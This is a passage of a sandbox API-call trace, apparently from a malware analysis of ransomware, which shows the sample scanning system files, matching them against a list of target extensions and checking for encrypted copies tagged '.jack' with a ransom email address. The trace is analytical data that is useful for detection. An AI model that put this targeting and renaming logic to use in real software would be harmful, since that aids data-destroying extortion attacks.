lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0199.287] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0199.288] lstrlenW (lpString=".jpg") returned 4 [0199.288] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0199.288] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.288] lstrlenW (lpString="auxbase.xml") returned 11 [0199.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0199.328] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=1434) returned 1 [0199.328] CloseHandle (hObject=0x3dc) returned 1 [0199.328] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0199.328] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.328] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.328] lstrlenW (lpString=".doc") returned 4 [0199.328] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.328] lstrlenW (lpString=".docx") returned 5 [0199.328] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0199.328] lstrlenW (lpString=".pdf") returned 4 [0199.328] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.328] lstrlenW (lpString=".xls") returned 4 [0199.328] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.329] lstrlenW (lpString=".xlsx") returned 5 [0199.329] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0199.329] lstrlenW (lpString=".ppt") returned 4 [0199.329] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.329] lstrlenW (lpString=".zip") returned 4 [0199.329] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.329] lstrlenW (lpString=".rar") returned 4 [0199.329] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.329] lstrlenW (lpString=".bz2") returned 4 [0199.329] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.329] lstrlenW (lpString=".7z") returned 3 [0199.329] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.329] lstrlenW (lpString=".dbf") returned 4 [0199.329] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.329] lstrlenW (lpString=".1cd") returned 4 [0199.329] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.329] lstrlenW (lpString=".jpg") returned 4 [0199.329] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.329] lstrlenW (lpString=".doc") returned 4 [0199.329] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.330] lstrlenW (lpString=".docx") returned 5 [0199.330] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0199.330] lstrlenW (lpString=".pdf") returned 4 [0199.330] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.330] lstrlenW (lpString=".xls") returned 4 [0199.330] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.330] lstrlenW (lpString=".xlsx") returned 5 [0199.330] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0199.330] lstrlenW (lpString=".ppt") returned 4 [0199.330] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.330] lstrlenW (lpString=".zip") returned 4 [0199.330] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.330] lstrlenW (lpString=".rar") returned 4 [0199.330] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.330] lstrlenW (lpString=".bz2") returned 4 [0199.330] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.330] lstrlenW (lpString=".7z") returned 3 [0199.330] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.330] lstrlenW (lpString=".dbf") returned 4 [0199.330] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.330] lstrlenW (lpString=".1cd") returned 4 [0199.330] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0199.330] lstrlenW (lpString=".jpg") returned 4 [0199.331] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.331] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.331] lstrlenW (lpString="ea.xml") returned 6 [0199.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0199.345] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=384) returned 1 [0199.345] CloseHandle (hObject=0x42c) returned 1 [0199.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20 [0199.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.346] lstrlenW (lpString=".doc") returned 4 [0199.346] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.346] lstrlenW (lpString=".docx") returned 5 [0199.346] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0199.346] lstrlenW (lpString=".pdf") returned 4 [0199.346] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.346] lstrlenW (lpString=".xls") returned 4 [0199.346] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.346] lstrlenW (lpString=".xlsx") returned 5 [0199.346] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0199.346] lstrlenW (lpString=".ppt") returned 4 [0199.346] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.346] lstrlenW (lpString=".zip") returned 4 [0199.346] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.346] lstrlenW (lpString=".rar") returned 4 [0199.346] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.346] lstrlenW (lpString=".bz2") returned 4 [0199.346] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.346] lstrlenW (lpString=".7z") returned 3 [0199.346] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.346] lstrlenW (lpString=".dbf") returned 4 [0199.347] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.347] lstrlenW (lpString=".1cd") returned 4 [0199.347] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.347] lstrlenW (lpString=".jpg") returned 4 [0199.347] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.347] lstrlenW (lpString=".doc") returned 4 [0199.347] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.347] lstrlenW (lpString=".docx") returned 5 [0199.347] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0199.347] lstrlenW (lpString=".pdf") returned 4 [0199.347] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.347] lstrlenW (lpString=".xls") returned 4 [0199.347] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.347] lstrlenW (lpString=".xlsx") returned 5 [0199.347] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0199.347] lstrlenW (lpString=".ppt") returned 4 [0199.347] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.348] lstrlenW (lpString=".zip") returned 4 [0199.348] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.348] lstrlenW (lpString=".rar") returned 4 [0199.348] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.348] lstrlenW (lpString=".bz2") returned 4 [0199.348] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.348] lstrlenW (lpString=".7z") returned 3 [0199.348] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.348] lstrlenW (lpString=".dbf") returned 4 [0199.348] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.348] lstrlenW (lpString=".1cd") returned 4 [0199.348] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0199.348] lstrlenW (lpString=".jpg") returned 4 [0199.348] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.348] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.348] lstrlenW (lpString="base_altgr.xml") returned 14 [0199.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0199.350] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=3524) returned 1 [0199.350] CloseHandle (hObject=0x42c) returned 1 [0199.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml")) returned 0x20 [0199.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.351] lstrlenW (lpString=".doc") returned 4 [0199.351] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.351] lstrlenW (lpString=".docx") returned 5 [0199.351] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0199.351] lstrlenW (lpString=".pdf") returned 4 [0199.351] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.351] lstrlenW (lpString=".xls") returned 4 [0199.351] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.351] lstrlenW (lpString=".xlsx") returned 5 [0199.351] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0199.351] lstrlenW (lpString=".ppt") returned 4 [0199.351] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.352] lstrlenW (lpString=".zip") returned 4 [0199.352] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.352] lstrlenW (lpString=".rar") returned 4 [0199.352] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.352] lstrlenW (lpString=".bz2") returned 4 [0199.352] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.352] lstrlenW (lpString=".7z") returned 3 [0199.352] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.352] lstrlenW (lpString=".dbf") returned 4 [0199.352] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.352] lstrlenW (lpString=".1cd") returned 4 [0199.352] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.352] lstrlenW (lpString=".jpg") returned 4 [0199.352] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.352] lstrlenW (lpString=".doc") returned 4 [0199.352] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.353] lstrlenW (lpString=".docx") returned 5 [0199.353] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0199.353] lstrlenW (lpString=".pdf") returned 4 [0199.353] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.353] lstrlenW (lpString=".xls") returned 4 [0199.353] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.353] lstrlenW (lpString=".xlsx") returned 5 [0199.353] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0199.353] lstrlenW (lpString=".ppt") returned 4 [0199.353] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.353] lstrlenW (lpString=".zip") returned 4 [0199.353] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.353] lstrlenW (lpString=".rar") returned 4 [0199.353] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.353] lstrlenW (lpString=".bz2") returned 4 [0199.353] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.353] lstrlenW (lpString=".7z") returned 3 [0199.353] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.353] lstrlenW (lpString=".dbf") returned 4 [0199.353] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.353] lstrlenW (lpString=".1cd") returned 4 [0199.353] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0199.353] lstrlenW (lpString=".jpg") returned 4 [0199.353] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.354] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.354] lstrlenW (lpString="base_heb.xml") returned 12 [0199.354] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0199.361] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=738) returned 1 [0199.361] CloseHandle (hObject=0x42c) returned 1 [0199.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml")) returned 0x20 [0199.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.362] lstrlenW (lpString=".doc") returned 4 [0199.362] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.362] lstrlenW (lpString=".docx") returned 5 [0199.362] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0199.362] lstrlenW (lpString=".pdf") returned 4 [0199.362] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.362] lstrlenW (lpString=".xls") returned 4 [0199.362] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.362] lstrlenW (lpString=".xlsx") returned 5 [0199.362] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0199.362] lstrlenW (lpString=".ppt") returned 4 [0199.362] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.362] lstrlenW (lpString=".zip") returned 4 [0199.363] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.363] lstrlenW (lpString=".rar") returned 4 [0199.363] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.363] lstrlenW (lpString=".bz2") returned 4 [0199.363] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.363] lstrlenW (lpString=".7z") returned 3 [0199.363] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.363] lstrlenW (lpString=".dbf") returned 4 [0199.363] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.363] lstrlenW (lpString=".1cd") returned 4 [0199.363] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.363] lstrlenW (lpString=".jpg") returned 4 [0199.363] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.363] lstrlenW (lpString=".doc") returned 4 [0199.363] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.363] lstrlenW (lpString=".docx") returned 5 [0199.363] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0199.363] lstrlenW (lpString=".pdf") returned 4 [0199.363] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.363] lstrlenW (lpString=".xls") returned 4 [0199.363] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.364] lstrlenW (lpString=".xlsx") returned 5 [0199.364] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0199.364] lstrlenW (lpString=".ppt") returned 4 [0199.364] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.364] lstrlenW (lpString=".zip") returned 4 [0199.364] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.364] lstrlenW (lpString=".rar") returned 4 [0199.364] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.364] lstrlenW (lpString=".bz2") returned 4 [0199.364] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.364] lstrlenW (lpString=".7z") returned 3 [0199.364] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.364] lstrlenW (lpString=".dbf") returned 4 [0199.364] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.364] lstrlenW (lpString=".1cd") returned 4 [0199.364] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0199.364] lstrlenW (lpString=".jpg") returned 4 [0199.364] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.364] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.365] lstrlenW (lpString="base_rtl.xml") returned 12 [0199.365] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0199.366] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=617) returned 1 [0199.366] CloseHandle (hObject=0x42c) returned 1 [0199.366] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml")) returned 0x20 [0199.366] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.367] lstrlenW (lpString=".doc") returned 4 [0199.367] 